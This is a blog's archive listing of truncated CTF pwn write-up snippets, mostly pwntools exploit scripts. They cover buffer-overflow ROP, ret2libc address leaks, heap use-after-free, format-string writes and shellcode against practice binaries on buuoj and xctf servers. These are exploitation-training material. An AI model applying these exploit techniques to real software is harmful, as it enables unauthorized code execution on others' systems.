![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
pwn
pwn
「已注销」
这个作者很懒,什么都没留下…
展开
-
GKCTF2021 checkin
from pwn import *context.log_level='debug'p = process('./login')elf = ELF('./login')libc = elf.libcputs_func = 0x00000000004018B5puts_got = 0x0000000000602028pop_rdi_ret = 0x0000000000401ab3main = 0x0000000000401A2Abss = 0x0000000000602400p.recv.原创 2021-06-27 23:11:36 · 516 阅读 · 0 评论 -
pwnable_start
from pwn import *loacl_elf = ELF("./start")context.arch = loacl_elf.arch#p = process("./start")p = remote("node3.buuoj.cn",28802)#gdb.attach(p, 'b* 0x08048060')#shellcode=asm(shellcraft.sh())shellcode = asm("xor ecx,ecx;\ xor edx,.原创 2021-03-13 22:22:31 · 349 阅读 · 0 评论 -
BJDCTF 2nd secret
from pwn import *p = remote('node3.buuoj.cn',27231)elf = ELF("./secret")p.recvuntil("# What's your name? _")payload = '/bin/sh\x00\x00\x00\x00\x00\x00\x00\x00\x00' + p32(elf.got['printf'])p.sendline(payload) answer = [0x476B,0x2D38,0x4540,0x3E77.原创 2021-01-11 11:10:50 · 109 阅读 · 0 评论 -
cmcc pwnme1
from pwn import *from LibcSearcher import LibcSearcher#p = process('./pwnme1')p = remote("node3.buuoj.cn",29175)elf = ELF('./pwnme1')plt_puts = elf.plt['puts']got_puts = elf.got['puts']main = elf.symbols["main"]getfruit_addr = 0x08048624payload =.原创 2020-12-27 19:31:14 · 240 阅读 · 0 评论 -
cmcc pwnme2
from pwn import *#p = process('./pwnme2')p = remote("node3.buuoj.cn",26522)libc = ELF('./libc-2.23.so')plt_puts = 0x08048490got_puts = 0x0804A028main = 0x080486F8payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).原创 2020-12-25 22:33:53 · 307 阅读 · 0 评论 -
xctf level3
from pwn import *#p = process(['./level3'],env={"LD_PRELOAD":"./libc_32.so.6"})p = remote("220.249.52.134",36907)libc = ELF("./libc_32.so.6")write_plt = 0x08048340write_got = 0x0804A018main = 0x0804844B#p = remote("220.249.52.133",54612)p.recvun.原创 2020-12-12 20:53:49 · 131 阅读 · 0 评论 -
xctf int_overflow
from pwn import *#p = process('./int_overflow')p = remote("220.249.52.133",54612)p.recvuntil('Your choice:')p.sendline('1')p.recvuntil('username:\n')p.sendline('1')p.recvuntil('passwd:\n')payload = '\x04'*24 + p32(0x0804868B) + 'c'*(260-28)#gdb.原创 2020-12-09 22:43:28 · 113 阅读 · 0 评论 -
xctf guess_num
from pwn import *#p = process('./guess_num')p = remote("220.249.52.133",41750)p.recvuntil('Your name:')payload = 'a'*32 + p64(1)#gdb.attach(p,'b* rebase(0x0000000000000D2B)')p.sendline(payload)p.recvuntil('number:')p.sendline('2')p.recvuntil('nu.原创 2020-12-09 21:40:27 · 128 阅读 · 0 评论 -
xctf string
from pwn import *#p = process('./string')p = remote("220.249.52.133",37754)p.recvuntil('secret[0] is ')addr = int(p.recv(7),16)log.sucess(hex(addr))p.recvuntil("name be:\n")p.sendline('test')p.recvuntil('east or up?:\n')p.sendline('east')p.recv.原创 2020-12-09 21:09:04 · 208 阅读 · 0 评论 -
0ctf2017 babyheap
from pwn import *#p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"})p = remote("node3.buuoj.cn",26165)elf = ELF('./0ctf_2017_babyheap')libc = ELF("./libc-2.23.so")def Allocate(size): p.recvuntil('Command: ') p.sendl.原创 2020-12-06 17:56:50 · 160 阅读 · 0 评论 -
buu hacknote
from pwn import *#p = process('./hacknote')p = remote("node3.buuoj.cn",29460)got_atoi = 0x0804A034#elf = ELF('./hacknote')#libc = elf.libclibc = ELF('./libc-2.23.so')def Add(size,context): p.recvuntil('Your choice :') p.sendline('1') p....原创 2020-12-06 12:48:18 · 135 阅读 · 0 评论 -
ropemporium新通关脚本
1)ret2win32from pwn import *catflag = 0x0804862Cp = process('./ret2win32')payload = 'A'*0x28 + p32(0) + p32(catflag) p.recvuntil('> ')p.send(payload)p.interactive()2)ret2winfrom pwn import *catflag = 0x0000000000400756p = process('./ret2win'原创 2020-09-27 21:25:24 · 265 阅读 · 5 评论 -
hitcontraining magicheap
from pwn import *magic = 0x00000000006020A0#p = process('./magicheap')p = remote("node3.buuoj.cn",26020)def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:原创 2020-06-16 22:05:38 · 355 阅读 · 0 评论 -
ciscn2019 pwn3
from pwn import *p = process("./ciscn_2019_n_3")elf = ELF('./ciscn_2019_n_3')def do_new_text(idx, lens, content): p.sendlineafter("CNote > ", '1') p.sendlineafter("Index > ", str(idx)) p.sendlineafter("Type > ", '2') p.sendlin原创 2020-05-26 07:34:41 · 363 阅读 · 0 评论 -
cmcc simplerop
from pwn import *p = process('./simplerop')p.recv()int80_addr = 0x080493e1pop_eax = 0x080bae06read = 0x0806CD50binsh = 0x080EB584pop_edx_ecx_ebx = 0x0806e850payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8)payl原创 2020-05-25 23:58:43 · 224 阅读 · 0 评论 -
bjdctf2020 babyrop2
from pwn import *p = process('bjdctf_2020_babyrop2')libcelf = ELF('/lib/x86_64-linux-gnu/libc.so.6')poprdiret = 0x0000000000400993main = 0x00000000004008DA pltputs = 0x0000000000400610gotputs = 0x0000000000601018p.sendlineafter("I'll give u some gif原创 2020-05-23 22:30:56 · 292 阅读 · 0 评论 -
V&N2020 simpleHeap
# coding:utf-8from pwn import *context(os='linux', arch='amd64', log_level='debug')p = process('./vn_pwn_simpleHeap')def add(size, content): p.sendlineafter("choice: ", '1') p.sendlineafter("size?", str(size)) p.sendlineafter("content:",原创 2020-05-20 22:41:01 · 246 阅读 · 0 评论 -
ZJCTF 2019 Login
from pwn import *p = process('./login')p.sendlineafter("username: ","admin")payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88)p.sendlineafter("password: ",payload)p.interactive()原创 2020-05-19 21:21:27 · 647 阅读 · 0 评论 -
hitcontraining hacknote
from pwn import *p = process('./hacknote')def add(size, content): p.sendlineafter('Your choice :', '1') p.sendlineafter('Note size :', str(size)) p.sendlineafter('Content :', content)def delete(idx): p.sendlineafter('Your choice :', '2')原创 2020-05-19 19:28:57 · 122 阅读 · 0 评论 -
bjdctf 2020 babystack2
from pwn import *p = process('./bjdctf_2020_babystack2')p.sendlineafter("length of your name:\n","-1")payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726)p.sendlineafter("name?\n",payload)p.interactive()原创 2020-05-19 19:26:58 · 238 阅读 · 0 评论 -
ez_pz_hackover_2016
测试栈溢出偏移量from pwn import *p = process('./ez_pz_hackover_2016')libc = ELF('/lib/i386-linux-gnu/libc.so.6')elf = ELF('./ez_pz_hackover_2016')context.log_level = 'debug'context.arch = elf.archpayload = 'crashme\x00' + 'aaaabaaacaaadaaaeaaafaaagaaahaaai原创 2020-05-12 07:49:20 · 316 阅读 · 2 评论 -
sctf2016 pwn2
from pwn import *from LibcSearcher import *main = 0x080485B8gotatoi = 0x0804A020formatstr = 0x080486F8pltprintf = 0x08048370p = process('./pwn2_sctf_2016')p.recvuntil("How many bytes do you want me to read? ")p.sendline('-1')p.recvuntil("data!\n")原创 2020-05-11 20:35:54 · 174 阅读 · 0 评论 -
bjdctf2020 babyrop
from pwn import *p = process('./bjdctf_2020_babyrop')libcelf = ELF('./libc-2.23.so')pop_rdi_ret = 0x0000000000400733pop_rsi_r15_ret = 0x0000000000400731pltputs = 0x00000000004004E0main = 0x00000000004006ADgotputs = 0x0000000000601018payload = 'a' *原创 2020-05-09 22:04:08 · 299 阅读 · 0 评论 -
铁人三项(第五赛区)2018 rop
from pwn import *p = process('./2018_rop')gotwrite = 0x0804A010pltwrite = 0x080483A0start = 0x080483C0bss = 0x0804A020pltread = 0x08048360def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04原创 2020-05-09 21:12:32 · 498 阅读 · 0 评论 -
bjdctf2020 babystack
from pwn import *p = process('./bjdctf_2020_babystack')p.recvuntil("length of your name:\n")p.sendline('1024')p.recvuntil("What's u name?\n")payload = 'a'*12 + p32(1024) + 'a'*8 + p64(0x000000000...原创 2020-05-08 08:03:53 · 350 阅读 · 2 评论 -
HarekazeCTF2019 baby_rop2
from pwn import *p = process('./babyrop2')libcelf = ELF('./libc-2.23.so')p = process('./babyrop2')p.recvuntil("What's your name? ")pltprintf = 0x00000000004004F0gotread = 0x0000000000601020popr...原创 2020-05-07 22:20:20 · 242 阅读 · 0 评论 -
ciscn_2019_n_8 wirte bss data
from pwn import *p = process("./ciscn_2019_n_8")p.recvuntil('name?\n')payload = p32(0x11) * 14p.sendline(payload)p.interactive()原创 2020-05-02 22:49:39 · 263 阅读 · 0 评论 -
ciscn_2019_en_2 ret2libc64
from pwn import *elf = ELF('./libc-2.23.so')p = process("./ciscn_2019_en_2")p.recvuntil('choice!\n')p.sendline("1")p.recvuntil('encrypted\n')poprdiret = 0x0000000000400c83pltputs = 0x0000000000...原创 2020-05-02 22:48:32 · 301 阅读 · 0 评论 -
buuoj return 2 DynELF level4
from pwn import *#p = process('./level4')p = remote("node3.buuoj.cn", 27510)elf = ELF('./level4')pltwrite = 0x08048340gotwrite = 0x0804A018pltread = 0x08048310bss_addr = 0x0804A024start = 0...原创 2020-04-29 22:03:41 · 114 阅读 · 0 评论 -
buuoj level3 x64 return to libc
from pwn import *#p = process('./pwn')#p = process('./level3_x64')p = remote("node3.buuoj.cn",25333)p.recvuntil("Input:\n")libc = ELF('./libc-2.23.so')poprdiret = 0x00000000004006b3poprsir15r...原创 2020-04-29 09:51:34 · 236 阅读 · 0 评论 -
[第五空间2019 决赛]PWN5
from pwn import *#p = process('./pwn')p = remote("node3.buuoj.cn",25955)addr_unk_804C044 = 0x0804C044payload = fmtstr_payload(10,{addr_unk_804C044:0x01})p.sendlineafter('your name:',payload)p.se...原创 2020-04-27 20:47:08 · 804 阅读 · 0 评论 -
DCICHF 2020 count
main函数:__int64 sub_400990(){ unsigned int v0; // w0 __int64 v1; // x0 __int64 v2; // x0 __int64 v3; // x0 __int64 v4; // x0 __int64 v6; // [xsp+10h] [xbp+10h] __int64 v7; // [xsp+78h] ...原创 2020-04-19 17:54:51 · 151 阅读 · 0 评论 -
buuoj BJDCTF 2nd ydsneedgirlfriend2
free代码,free以后未置空指针unsigned __int64 dele(){…… free(*(void **)girlfriends[v1]); free((void *)girlfriends[v1]); ……}可以再次利用from pwn import *#sh = process('./ydsneedgirlfriend2')def ad...原创 2020-03-30 22:36:08 · 334 阅读 · 0 评论 -
buuoj BJDCTF 2nd r2t3
buf定义长度为0x400。而buf的长度为0x408所以不存在溢出。可见name_check函数存在安全漏洞,但是要绕过长度限制。unsigned __int8 v3定义的数据类型实际为unsigned char。仅有1个字节,超过1个字节数据丢弃,也就是最大数值为0xff ,也就是0x100=256=0,那么可以用0x104至0x107来满足上面的条件。即为传说中的整形溢出...原创 2020-03-26 22:31:28 · 701 阅读 · 0 评论 -
buuoj jarvisoj_test_your_memory
存在溢出漏洞:进行了逻辑判断,相等则输出good job!!!从堆栈上看,s2在return地址下面。整合上面,便于脚本如下:from pwn import*p = process('./memory')system_addr = 0x08048440catflag_addr = 0x080487E0payload='A'*0x17 + p32(system_addr...原创 2020-03-26 21:39:30 · 286 阅读 · 0 评论 -
buuoj jarvisoj_tell_me_something
main函数:int __cdecl main(int argc, const char **argv, const char **envp){ __int64 v4; // [rsp+0h] [rbp-88h] write(1, "Input your message:\n", 0x14uLL); read(0, &v4, 0x100uLL); return wri...原创 2020-03-26 09:29:54 · 170 阅读 · 0 评论 -
buuoj BJDCTF 2nd one_gadget
程序输出printf函数地址可以利用工具one_gadget计算libc基址from pwn import *#p = process('./one_gadget')p = remote("node3.buuoj.cn",26742)out = p.recv()addr = int(out[out.find('0x')+2:out.find('0x')+14],16)...原创 2020-03-25 23:59:30 · 617 阅读 · 0 评论 -
buuctf jarvisoj_fm
存在格式化字符串漏洞而实际上x的值为3需要通过格式化字符串漏洞来重写x的值使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n,意思将0x0804A02C的x地址写入32位大小的一个...原创 2020-03-19 23:10:46 · 300 阅读 · 0 评论